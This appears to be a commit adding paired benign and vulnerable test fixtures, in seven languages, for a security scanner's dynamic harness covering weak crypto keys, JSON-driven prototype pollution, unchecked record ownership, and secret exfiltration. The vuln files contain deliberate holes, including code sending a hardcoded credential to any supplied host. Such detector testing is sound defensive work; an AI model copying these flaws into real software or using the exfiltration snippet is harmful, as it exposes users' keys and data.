[pitboss] phase 11: Track J.9 + Track L.9 — CRYPTO, JSON_PARSE, UNAUTHORIZED_ID, DATA_EXFIL corpora

tests/dynamic_fixtures/crypto/go/benign.go

@@ -0,0 +1,12 @@
+// Phase 11 (Track J.9) — Go CRYPTO benign control fixture.
+//
+// Uses crypto/rand.Read (a CSPRNG) for key derivation.
+package benign
+
+import "crypto/rand"
+
+func Run(_ string) []byte {
+    buf := make([]byte, 32)
+    _, _ = rand.Read(buf)
+    return buf
+}

tests/dynamic_fixtures/crypto/go/vuln.go

@@ -0,0 +1,12 @@
+// Phase 11 (Track J.9) — Go CRYPTO vuln fixture.
+//
+// Uses math/rand.Intn(0x10000) (a non-CSPRNG) to derive a 16-bit
+// key.  The harness's instrumented key path writes a
+// `ProbeKind::WeakKey` probe and the `WeakKeyEntropy` oracle fires.
+package vuln
+
+import "math/rand"
+
+func Run(_ string) int {
+    return rand.Intn(0x10000)
+}

tests/dynamic_fixtures/crypto/java/benign.java

@@ -0,0 +1,14 @@
+// Phase 11 (Track J.9) — Java CRYPTO benign control fixture.
+//
+// Uses java.security.SecureRandom (a CSPRNG) for key derivation, so
+// the produced 256-bit key trivially exceeds the 16-bit weak budget.
+import java.security.SecureRandom;
+
+public class Benign {
+    public static byte[] run(String _unused) {
+        SecureRandom r = new SecureRandom();
+        byte[] key = new byte[32];
+        r.nextBytes(key);
+        return key;
+    }
+}

tests/dynamic_fixtures/crypto/java/vuln.java

@@ -0,0 +1,16 @@
+// Phase 11 (Track J.9) — Java CRYPTO vuln fixture.
+//
+// Uses java.util.Random (a non-CSPRNG) to derive key bytes, producing
+// a key bounded inside a 16-bit search space.  The harness's
+// instrumented key-generation path writes a `ProbeKind::WeakKey`
+// probe; the `WeakKeyEntropy` oracle fires for `key_int < 2^16`.
+import java.util.Random;
+
+public class Vuln {
+    public static byte[] run(String seedTag) {
+        Random r = new Random(seedTag.hashCode());
+        byte[] key = new byte[2];
+        r.nextBytes(key);
+        return key;
+    }
+}

tests/dynamic_fixtures/crypto/php/benign.php

@@ -0,0 +1,7 @@
+<?php
+// Phase 11 (Track J.9) — PHP CRYPTO benign control fixture.
+//
+// Uses `random_bytes(32)` (a CSPRNG) for key derivation.
+function run($_value) {
+    return random_bytes(32);
+}

tests/dynamic_fixtures/crypto/php/vuln.php

@@ -0,0 +1,7 @@
+<?php
+// Phase 11 (Track J.9) — PHP CRYPTO vuln fixture.
+//
+// Uses `mt_rand(0, 0xFFFF)` (a non-CSPRNG) to derive a 16-bit key.
+function run($_value) {
+    return mt_rand(0, 0xFFFF);
+}

tests/dynamic_fixtures/crypto/python/benign.py

@@ -0,0 +1,9 @@
+# Phase 11 (Track J.9) — Python CRYPTO benign control fixture.
+#
+# Uses `secrets.token_bytes(32)` (a CSPRNG) so the produced key
+# trivially exceeds the weak budget.
+import secrets
+
+
+def run(_value):
+    return secrets.token_bytes(32)

tests/dynamic_fixtures/crypto/python/vuln.py

@@ -0,0 +1,10 @@
+# Phase 11 (Track J.9) — Python CRYPTO vuln fixture.
+#
+# Uses `random.randint(0, 0xFFFF)` (a non-CSPRNG) to derive a 16-bit
+# key; the harness's instrumented key path writes a `ProbeKind::WeakKey`
+# probe and the `WeakKeyEntropy` oracle fires.
+import random
+
+
+def run(_value):
+    return random.randint(0, 0xFFFF)

tests/dynamic_fixtures/crypto/rust/benign.rs

@@ -0,0 +1,11 @@
+// Phase 11 (Track J.9) — Rust CRYPTO benign control fixture.
+//
+// Uses `rand::rngs::OsRng` (a CSPRNG) for key derivation.
+use rand::rngs::OsRng;
+use rand::RngCore;
+
+pub fn run(_value: &str) -> [u8; 32] {
+    let mut key = [0u8; 32];
+    OsRng.fill_bytes(&mut key);
+    key
+}

tests/dynamic_fixtures/crypto/rust/vuln.rs

@@ -0,0 +1,9 @@
+// Phase 11 (Track J.9) — Rust CRYPTO vuln fixture.
+//
+// Uses `rand::thread_rng` truncated to 16 bits (a non-CSPRNG
+// configuration) to derive a key bounded inside the weak budget.
+use rand::Rng;
+
+pub fn run(_value: &str) -> u16 {
+    rand::thread_rng().gen_range(0..=0xFFFF) as u16
+}

tests/dynamic_fixtures/data_exfil/go/benign.go

@@ -0,0 +1,19 @@
+// Phase 11 (Track J.9) — Go DATA_EXFIL benign control fixture.
+package benign
+
+import (
+    "net/http"
+    "net/url"
+)
+
+var allowlist = map[string]struct{}{"127.0.0.1": {}, "localhost": {}}
+
+func Run(host string) {
+    if _, ok := allowlist[host]; !ok {
+        return
+    }
+    secret := "alice-creds"
+    q := url.Values{"token": {secret}}
+    u := url.URL{Scheme: "http", Host: host, Path: "/exfil", RawQuery: q.Encode()}
+    _, _ = http.Get(u.String())
+}

tests/dynamic_fixtures/data_exfil/go/vuln.go

@@ -0,0 +1,14 @@
+// Phase 11 (Track J.9) — Go DATA_EXFIL vuln fixture.
+package vuln
+
+import (
+    "net/http"
+    "net/url"
+)
+
+func Run(host string) {
+    secret := "alice-creds"
+    q := url.Values{"token": {secret}}
+    u := url.URL{Scheme: "http", Host: host, Path: "/exfil", RawQuery: q.Encode()}
+    _, _ = http.Get(u.String())
+}

tests/dynamic_fixtures/data_exfil/java/benign.java

@@ -0,0 +1,16 @@
+// Phase 11 (Track J.9) — Java DATA_EXFIL benign control fixture.
+import java.net.HttpURLConnection;
+import java.net.URL;
+import java.util.Set;
+
+public class Benign {
+    private static final Set<String> ALLOWLIST = Set.of("127.0.0.1", "localhost");
+
+    public static void run(String host) throws Exception {
+        if (!ALLOWLIST.contains(host)) return;
+        URL url = new URL("http://" + host + "/exfil?token=alice-creds");
+        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
+        conn.connect();
+        conn.disconnect();
+    }
+}

tests/dynamic_fixtures/data_exfil/java/vuln.java

@@ -0,0 +1,13 @@
+// Phase 11 (Track J.9) — Java DATA_EXFIL vuln fixture.
+import java.net.HttpURLConnection;
+import java.net.URL;
+
+public class Vuln {
+    public static void run(String host) throws Exception {
+        String secret = "alice-creds";
+        URL url = new URL("http://" + host + "/exfil?token=" + secret);
+        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
+        conn.connect();
+        conn.disconnect();
+    }
+}

tests/dynamic_fixtures/data_exfil/js/benign.js

@@ -0,0 +1,17 @@
+// Phase 11 (Track J.9) — JavaScript DATA_EXFIL benign control fixture.
+const http = require('http');
+
+const ALLOWLIST = new Set(['127.0.0.1', 'localhost']);
+
+function run(host) {
+    if (!ALLOWLIST.has(host)) return;
+    const secret = 'alice-creds';
+    const req = http.request({
+        host,
+        path: '/exfil?token=' + encodeURIComponent(secret),
+        method: 'POST',
+    });
+    req.end();
+}
+
+module.exports = { run };

tests/dynamic_fixtures/data_exfil/js/vuln.js

@@ -0,0 +1,14 @@
+// Phase 11 (Track J.9) — JavaScript DATA_EXFIL vuln fixture.
+const http = require('http');
+
+function run(host) {
+    const secret = 'alice-creds';
+    const req = http.request({
+        host,
+        path: '/exfil?token=' + encodeURIComponent(secret),
+        method: 'POST',
+    });
+    req.end();
+}
+
+module.exports = { run };

tests/dynamic_fixtures/data_exfil/php/benign.php

@@ -0,0 +1,8 @@
+<?php
+// Phase 11 (Track J.9) — PHP DATA_EXFIL benign control fixture.
+function run($host) {
+    if (!in_array($host, ["127.0.0.1", "localhost"], true)) return;
+    $secret = "alice-creds";
+    $url = "http://" . $host . "/exfil?token=" . urlencode($secret);
+    @file_get_contents($url);
+}

tests/dynamic_fixtures/data_exfil/php/vuln.php

@@ -0,0 +1,7 @@
+<?php
+// Phase 11 (Track J.9) — PHP DATA_EXFIL vuln fixture.
+function run($host) {
+    $secret = "alice-creds";
+    $url = "http://" . $host . "/exfil?token=" . urlencode($secret);
+    @file_get_contents($url);
+}

tests/dynamic_fixtures/data_exfil/python/benign.py

@@ -0,0 +1,15 @@
+# Phase 11 (Track J.9) — Python DATA_EXFIL benign control fixture.
+#
+# Sends to a loopback receiver, so the captured host is on-allowlist
+# and the predicate stays clear.
+import urllib.request
+
+ALLOWLIST = {"127.0.0.1", "localhost"}
+
+
+def run(host):
+    if host not in ALLOWLIST:
+        return
+    secret = "alice-creds"
+    url = f"http://{host}/exfil?token={secret}"
+    urllib.request.urlopen(url, timeout=1)

tests/dynamic_fixtures/data_exfil/python/vuln.py

@@ -0,0 +1,12 @@
+# Phase 11 (Track J.9) — Python DATA_EXFIL vuln fixture.
+#
+# Sends a captured secret to an attacker-controlled host without
+# host validation; the harness's mock HTTP client records the
+# outbound `host` and the `OutboundHostNotIn` oracle fires.
+import urllib.request
+
+
+def run(host):
+    secret = "alice-creds"
+    url = f"http://{host}/exfil?token={secret}"
+    urllib.request.urlopen(url, timeout=1)

tests/dynamic_fixtures/data_exfil/ruby/benign.rb

@@ -0,0 +1,12 @@
+# Phase 11 (Track J.9) — Ruby DATA_EXFIL benign control fixture.
+require 'net/http'
+require 'uri'
+
+ALLOWLIST = %w[127.0.0.1 localhost].freeze
+
+def run(host)
+  return unless ALLOWLIST.include?(host)
+  secret = "alice-creds"
+  uri = URI("http://#{host}/exfil?token=#{secret}")
+  Net::HTTP.get(uri)
+end

tests/dynamic_fixtures/data_exfil/ruby/vuln.rb

@@ -0,0 +1,9 @@
+# Phase 11 (Track J.9) — Ruby DATA_EXFIL vuln fixture.
+require 'net/http'
+require 'uri'
+
+def run(host)
+  secret = "alice-creds"
+  uri = URI("http://#{host}/exfil?token=#{secret}")
+  Net::HTTP.get(uri)
+end

tests/dynamic_fixtures/data_exfil/rust/benign.rs

@@ -0,0 +1,11 @@
+// Phase 11 (Track J.9) — Rust DATA_EXFIL benign control fixture.
+const ALLOWLIST: &[&str] = &["127.0.0.1", "localhost"];
+
+pub fn run(host: &str) {
+    if !ALLOWLIST.contains(&host) {
+        return;
+    }
+    let secret = "alice-creds";
+    let url = format!("http://{host}/exfil?token={secret}");
+    let _ = reqwest::blocking::get(&url);
+}

tests/dynamic_fixtures/data_exfil/rust/vuln.rs

@@ -0,0 +1,6 @@
+// Phase 11 (Track J.9) — Rust DATA_EXFIL vuln fixture.
+pub fn run(host: &str) {
+    let secret = "alice-creds";
+    let url = format!("http://{host}/exfil?token={secret}");
+    let _ = reqwest::blocking::get(&url);
+}

tests/dynamic_fixtures/json_parse/javascript/benign.js

@@ -0,0 +1,16 @@
+// Phase 11 (Track J.9) — JavaScript JSON_PARSE benign control fixture.
+//
+// JSON.parse then deep-merge into a `Object.create(null)` target, the
+// canonical mitigation; the prototype-less target cannot reach
+// `Object.prototype` so the canary never fires.
+function run(value) {
+    const parsed = JSON.parse(value);
+    const target = Object.create(null);
+    for (const k of Object.keys(parsed)) {
+        if (k === '__proto__' || k === 'constructor') continue;
+        target[k] = parsed[k];
+    }
+    return target;
+}
+
+module.exports = { run };

tests/dynamic_fixtures/json_parse/javascript/vuln.js

@@ -0,0 +1,24 @@
+// Phase 11 (Track J.9) — JavaScript JSON_PARSE vuln fixture.
+//
+// JSON.parse the attacker bytes then naive deep-merge into a vanilla
+// target object.  A `__proto__` key walks into `Object.prototype` and
+// trips the canary trap.
+function run(value) {
+    const parsed = JSON.parse(value);
+    const target = {};
+    deepMerge(target, parsed);
+    return target;
+}
+
+function deepMerge(t, s) {
+    for (const k of Object.keys(s)) {
+        if (s[k] !== null && typeof s[k] === 'object') {
+            if (typeof t[k] !== 'object' || t[k] === null) t[k] = {};
+            deepMerge(t[k], s[k]);
+        } else {
+            t[k] = s[k];
+        }
+    }
+}
+
+module.exports = { run };

tests/dynamic_fixtures/json_parse/python/benign.py

@@ -0,0 +1,10 @@
+# Phase 11 (Track J.9) — Python JSON_PARSE benign control fixture.
+#
+# json.loads then merge into a fresh `dict` rather than mutating the
+# shared sentinel, so the canary trap on `_SHARED` cannot fire.
+import json
+
+
+def run(value):
+    parsed = json.loads(value)
+    return dict(parsed)

tests/dynamic_fixtures/json_parse/python/vuln.py

@@ -0,0 +1,20 @@
+# Phase 11 (Track J.9) — Python JSON_PARSE vuln fixture.
+#
+# json.loads the attacker bytes then mutate a shared sentinel via
+# attribute pollution; the harness's instrumented setattr trap
+# observes the `__nyx_canary` write.
+import json
+
+
+class _Sentinel:
+    pass
+
+
+_SHARED = _Sentinel()
+
+
+def run(value):
+    parsed = json.loads(value)
+    for k, v in parsed.items():
+        setattr(_SHARED, k, v)
+    return _SHARED

tests/dynamic_fixtures/json_parse/ruby/benign.rb

@@ -0,0 +1,9 @@
+# Phase 11 (Track J.9) — Ruby JSON_PARSE benign control fixture.
+#
+# JSON.parse then merge into a freshly allocated `Hash`, so the
+# canary trap on `SHARED` cannot fire.
+require 'json'
+
+def run(value)
+  JSON.parse(value).dup
+end

tests/dynamic_fixtures/json_parse/ruby/vuln.rb

@@ -0,0 +1,15 @@
+# Phase 11 (Track J.9) — Ruby JSON_PARSE vuln fixture.
+#
+# JSON.parse the attacker bytes then recursively merge into a shared
+# `OpenStruct`; the harness's instrumented `method_missing=` trap
+# observes the `__nyx_canary` write.
+require 'json'
+require 'ostruct'
+
+SHARED = OpenStruct.new
+
+def run(value)
+  parsed = JSON.parse(value)
+  parsed.each { |k, v| SHARED[k] = v }
+  SHARED
+end

tests/dynamic_fixtures/unauthorized_id/go/benign.go

@@ -0,0 +1,13 @@
+// Phase 11 (Track J.9) — Go UNAUTHORIZED_ID benign control fixture.
+package benign
+
+const callerID = "alice"
+
+var store = map[string]string{"alice": "alice@x", "bob": "bob@x"}
+
+func Run(ownerID string) string {
+    if ownerID != callerID {
+        return ""
+    }
+    return store[ownerID]
+}

tests/dynamic_fixtures/unauthorized_id/go/vuln.go

@@ -0,0 +1,10 @@
+// Phase 11 (Track J.9) — Go UNAUTHORIZED_ID vuln fixture.
+package vuln
+
+const callerID = "alice"
+
+var store = map[string]string{"alice": "alice@x", "bob": "bob@x"}
+
+func Run(ownerID string) string {
+    return store[ownerID]
+}

tests/dynamic_fixtures/unauthorized_id/java/benign.java

@@ -0,0 +1,17 @@
+// Phase 11 (Track J.9) — Java UNAUTHORIZED_ID benign control fixture.
+import java.util.HashMap;
+import java.util.Map;
+
+public class Benign {
+    private static final String CALLER = "alice";
+    private static final Map<String, String> STORE = new HashMap<>();
+    static {
+        STORE.put("alice", "alice@x");
+        STORE.put("bob", "bob@x");
+    }
+
+    public static String run(String ownerId) {
+        if (!CALLER.equals(ownerId)) return null;
+        return STORE.get(ownerId);
+    }
+}

tests/dynamic_fixtures/unauthorized_id/java/vuln.java

@@ -0,0 +1,16 @@
+// Phase 11 (Track J.9) — Java UNAUTHORIZED_ID vuln fixture.
+import java.util.HashMap;
+import java.util.Map;
+
+public class Vuln {
+    private static final String CALLER = "alice";
+    private static final Map<String, String> STORE = new HashMap<>();
+    static {
+        STORE.put("alice", "alice@x");
+        STORE.put("bob", "bob@x");
+    }
+
+    public static String run(String ownerId) {
+        return STORE.get(ownerId);
+    }
+}

tests/dynamic_fixtures/unauthorized_id/js/benign.js

@@ -0,0 +1,10 @@
+// Phase 11 (Track J.9) — JavaScript UNAUTHORIZED_ID benign control fixture.
+const CALLER_ID = "alice";
+const STORE = { alice: "alice@x", bob: "bob@x" };
+
+function run(ownerId) {
+    if (ownerId !== CALLER_ID) return null;
+    return STORE[ownerId];
+}
+
+module.exports = { run };

tests/dynamic_fixtures/unauthorized_id/js/vuln.js

@@ -0,0 +1,9 @@
+// Phase 11 (Track J.9) — JavaScript UNAUTHORIZED_ID vuln fixture.
+const CALLER_ID = "alice";
+const STORE = { alice: "alice@x", bob: "bob@x" };
+
+function run(ownerId) {
+    return STORE[ownerId];
+}
+
+module.exports = { run };

tests/dynamic_fixtures/unauthorized_id/php/benign.php

@@ -0,0 +1,10 @@
+<?php
+// Phase 11 (Track J.9) — PHP UNAUTHORIZED_ID benign control fixture.
+const CALLER_ID = "alice";
+$STORE = ["alice" => "alice@x", "bob" => "bob@x"];
+
+function run($ownerId) {
+    global $STORE;
+    if ($ownerId !== CALLER_ID) return null;
+    return $STORE[$ownerId] ?? null;
+}

tests/dynamic_fixtures/unauthorized_id/php/vuln.php

@@ -0,0 +1,9 @@
+<?php
+// Phase 11 (Track J.9) — PHP UNAUTHORIZED_ID vuln fixture.
+const CALLER_ID = "alice";
+$STORE = ["alice" => "alice@x", "bob" => "bob@x"];
+
+function run($ownerId) {
+    global $STORE;
+    return $STORE[$ownerId] ?? null;
+}

tests/dynamic_fixtures/unauthorized_id/python/benign.py

@@ -0,0 +1,12 @@
+# Phase 11 (Track J.9) — Python UNAUTHORIZED_ID benign control fixture.
+#
+# Compares `owner_id` against the authenticated caller and returns
+# `None` for any boundary-crossing request.
+_STORE = {"alice": {"email": "alice@x"}, "bob": {"email": "bob@x"}}
+_CALLER_ID = "alice"
+
+
+def run(owner_id):
+    if owner_id != _CALLER_ID:
+        return None
+    return _STORE.get(owner_id)

tests/dynamic_fixtures/unauthorized_id/python/vuln.py

@@ -0,0 +1,11 @@
+# Phase 11 (Track J.9) — Python UNAUTHORIZED_ID vuln fixture.
+#
+# Looks up a record by `owner_id` without checking it against the
+# authenticated caller; an attacker who supplies another user's id
+# reads that user's record.
+_STORE = {"alice": {"email": "alice@x"}, "bob": {"email": "bob@x"}}
+_CALLER_ID = "alice"
+
+
+def run(owner_id):
+    return _STORE.get(owner_id)

tests/dynamic_fixtures/unauthorized_id/ruby/benign.rb

@@ -0,0 +1,8 @@
+# Phase 11 (Track J.9) — Ruby UNAUTHORIZED_ID benign control fixture.
+STORE = { "alice" => { email: "alice@x" }, "bob" => { email: "bob@x" } }.freeze
+CALLER_ID = "alice"
+
+def run(owner_id)
+  return nil unless owner_id == CALLER_ID
+  STORE[owner_id]
+end

tests/dynamic_fixtures/unauthorized_id/ruby/vuln.rb

@@ -0,0 +1,7 @@
+# Phase 11 (Track J.9) — Ruby UNAUTHORIZED_ID vuln fixture.
+STORE = { "alice" => { email: "alice@x" }, "bob" => { email: "bob@x" } }.freeze
+CALLER_ID = "alice"
+
+def run(owner_id)
+  STORE[owner_id]
+end

tests/dynamic_fixtures/unauthorized_id/rust/benign.rs

@@ -0,0 +1,14 @@
+// Phase 11 (Track J.9) — Rust UNAUTHORIZED_ID benign control fixture.
+use std::collections::HashMap;
+
+const CALLER_ID: &str = "alice";
+
+pub fn run(owner_id: &str) -> Option<String> {
+    if owner_id != CALLER_ID {
+        return None;
+    }
+    let mut store = HashMap::new();
+    store.insert("alice".to_string(), "alice@x".to_string());
+    store.insert("bob".to_string(), "bob@x".to_string());
+    store.get(owner_id).cloned()
+}

tests/dynamic_fixtures/unauthorized_id/rust/vuln.rs

@@ -0,0 +1,11 @@
+// Phase 11 (Track J.9) — Rust UNAUTHORIZED_ID vuln fixture.
+use std::collections::HashMap;
+
+const CALLER_ID: &str = "alice";
+
+pub fn run(owner_id: &str) -> Option<String> {
+    let mut store = HashMap::new();
+    store.insert("alice".to_string(), "alice@x".to_string());
+    store.insert("bob".to_string(), "bob@x".to_string());
+    store.get(owner_id).cloned()
+}